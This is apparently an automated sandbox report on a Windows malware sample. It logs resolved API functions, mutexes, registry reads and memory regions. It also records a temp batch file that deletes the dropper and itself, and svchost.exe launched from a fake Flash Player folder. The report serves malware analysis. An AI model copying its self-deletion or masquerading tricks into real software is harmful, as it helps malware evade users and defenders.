Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtCreateFile, address_out = 0x77cd00a4	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtClose, address_out = 0x77ccf9d0	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQueryEaFile, address_out = 0x77cd1314	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtSetEaFile, address_out = 0x77cd19b0	1	Fn

Window (5)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Create	Langskallet7	wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = VBMsoStdCompMgr, index = 0, new_long = 3612828	1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721		1	Fn

System (43)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = 15 milliseconds (0.015 seconds)	32	Fn
Sleep	duration = 8000 milliseconds (8.000 seconds)	1	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Operating System	5	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (9)

Operation	Additional Information	Count	Logfile
Create	-	1	Fn
Create	mutex_name = C2E6ECE9938A43206F172A85684E36DB	1	Fn
Create	mutex_name = A63A6CDA308CF3B4F10C6B82D6B9EA5B	1	Fn
Create	mutex_name = 629BC138D148FEC80DAF76D454EF252E	1	Fn
Open	mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE	1	Fn
Open	mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE	2	Fn
Open	mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE	2	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #23: cmd.exe

(Host: 114, Network: 0)

Information	Value
ID	#23
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:05:38, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:04:35

OS Process Information

Information	Value
PID	0x6a4
Parent PID	0x594 (c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 464

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000b0000	0x000b0000	0x000b1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x001cffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x001d0000	0x00236fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000240000	0x00240000	0x00240fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000340000	0x00340000	0x003bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000530000	0x00530000	0x0062ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000007b0000	0x007b0000	0x007bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000007c0000	0x007c0000	0x00947fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000950000	0x00950000	0x00ad0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000ae0000	0x00ae0000	0x01edffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001ee0000	0x01ee0000	0x02222fff	Pagefile Backed Memory	Readable	Region Actions
cmd.exe	0x4a530000	0x4a57bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x756d0000	0x756d6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (71)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	5	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Get Info	C:\Windows\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	5	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp	type = file_attributes	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat	type = file_attributes	2	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	13	Fn
Open	STD_INPUT_HANDLE	-	7	Fn
Open	STD_INPUT_HANDLE	-	20	Fn
Open	STD_ERROR_HANDLE	-	3	Fn
Read	STD_INPUT_HANDLE	size = 8191, size_out = 216	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 205	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 201	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 135	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 63	1	Fn Data
Write	STD_ERROR_HANDLE	size = 33	1	Fn Data
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	-	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat	-	1	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (12)

Operation	Module	Additional Information	Count	Logfile
Load	ADVAPI32.dll	base_address = 0x77740000	1	Fn
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0x4a530000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759c0000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x759ea84f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x759f3b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x759d4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x759ea79d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferIdentifyLevel, address_out = 0x77762102	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferComputeTokenFromLevel, address_out = 0x77763352	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferCloseLevel, address_out = 0x77763825	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-01-10 18:57:08 (UTC)		1	Fn
Get Time	type = Ticks, time = 55271		1	Fn

Environment (12)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #24: svchost.exe

(Host: 7573, Network: 376)

Information	Value
ID	#24
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory	C:\Users\aETAdzjz\AppData\Roaming\
Monitor	Start Time: 00:07:38, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:02:35

OS Process Information

Information	Value
PID	0x638
Parent PID	0x7e8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6FC 0x 538 0x 760 0x 594 0x 7BC 0x 74C 0x 548 0x 7D8 0x 7A8 0x 774 0x 12C 0x 790 0x 794 0x 698 0x 728 0x 670 0x 71C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x0003ffff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0008bfff	Private Memory	Readable, Writable, Executable	Region Actions
imm32.dll	0x00090000	0x000adfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00091fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000b0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	Readable	Region Actions
windowsshell.manifest	0x000d0000	0x000d0fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000f0000	0x000f0000	0x0012ffff	Private Memory	Readable, Writable	Region Actions
index.dat	0x00130000	0x0013bfff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000140000	0x00140000	0x0017ffff	Private Memory	Readable, Writable	Region Actions
index.dat	0x00140000	0x00147fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x00150000	0x0015ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x001affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000190000	0x00190000	0x001cffff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x001d0000	0x0020bfff	Memory Mapped File	Readable	Region Actions
private_0x00000000001d0000	0x001d0000	0x0020ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00250000	0x002b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002e0000	0x002e0000	0x0035ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000360000	0x00360000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000390000	0x00390000	0x003cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003d0000	0x003d0000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0x004a0000	0x004a7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000004f0000	0x004f0000	0x0052ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000540000	0x00540000	0x0063ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x007c7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007d0000	0x007d0000	0x00950fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000960000	0x00960000	0x01d5ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d60000	0x01d60000	0x02152fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02160000	0x0242efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002430000	0x02430000	0x0246ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002480000	0x02480000	0x024bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002520000	0x02520000	0x0255ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002590000	0x02590000	0x025cffff	Private Memory	Readable, Writable	Region Actions
